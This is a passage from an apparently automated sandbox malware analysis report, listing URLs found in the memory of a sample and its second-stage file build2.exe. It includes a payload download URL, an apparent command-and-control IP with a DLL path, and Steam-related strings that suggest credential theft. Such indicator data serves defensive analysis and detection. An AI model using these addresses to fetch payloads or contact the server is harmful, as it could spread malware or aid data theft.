Source: sIQywRNC5M.exe, 00000005.00000003.2543898374.0000000000845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exeruneru
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: sIQywRNC5M.exe, 00000007.00000003.2118066031.0000000003210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: sIQywRNC5M.exe, 00000005.00000003.2118180981.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: sIQywRNC5M.exe, 00000007.00000003.2118210085.0000000003210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: sIQywRNC5M.exe, 00000005.00000003.2118257770.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: sIQywRNC5M.exe, 00000007.00000003.2118302997.0000000003210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000009.00000002.2290229277.000000001E98D000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2290689219.0000000020E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: sIQywRNC5M.exe, 00000005.00000003.2118339611.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: sIQywRNC5M.exe, 00000007.00000003.2118410948.0000000003210000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: sIQywRNC5M.exe, 00000005.00000003.2118438194.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149
Source: build2.exe, 00000009.00000002.2286401544.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHt
Source: build2.exe, 00000009.00000002.2286401544.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149.exe
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/1
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/7
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/D
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/F
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/H
Source: build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/L
Source: build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/crosoft
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/l%
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/p
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/so
Source: build2.exe, 00000009.00000002.2286401544.0000000000514000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dll
Source: build2.exe, 00000009.00000002.2287398804.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dll-wt
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/system32
Source: build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/t
Source: build2.exe, 00000009.00000002.2286401544.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.1490.5938.132
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149GCAEH
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000514000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149ta
Source: craw_window.js.5.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: sIQywRNC5M.exe, 00000005.00000003.2120539696.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000657000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000003.2041498848.000000000066A000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000003.2554428371.0000000000714000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000716000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000003.2709544963.000000000087B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000003.2709947918.000000000087C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2714231614.000000000087C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000657000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000003.2041498848.000000000066A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/7
Source: sIQywRNC5M.exe, 00000016.00000003.2554428371.0000000000714000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/A
Source: sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000072C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/S
Source: sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000716000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000018.00000002.2705389001.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000003.2709544963.000000000087B000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000003.2709947918.000000000087C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713323845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2714231614.000000000087C000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json$NF
Source: sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json&
Source: sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json8#
Source: sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json:
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonYS;
Source: sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonZ
Source: sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonj
Source: sIQywRNC5M.exe, 00000016.00000003.2554428371.0000000000714000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000716000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonqS
Source: sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: sIQywRNC5M.exe, 00000019.00000002.2713992909.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsony
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: sIQywRNC5M.exe, 00000005.00000003.2124951153.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
Source: sIQywRNC5M.exe, 00000005.00000003.2120539696.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: sIQywRNC5M.exe, 00000005.00000003.2120539696.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: sIQywRNC5M.exe, 00000005.00000003.2120539696.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com.br/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com.br/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com.cn/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com.cn/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xml
Source: excel.exe_Rules.xml.5.dr	String found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
Source: build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000009.00000003.2122913722.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2125056927.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: sIQywRNC5M.exe, 00000005.00000003.2126068659.0000000009A60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/generate_204
Source: build2.exe, 00000009.00000002.2287398804.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2124821832.0000000000834000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: build2.exe, 00000009.00000003.2162218326.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2286401544.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208135639.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2187407461.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142892182.0000000000840000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
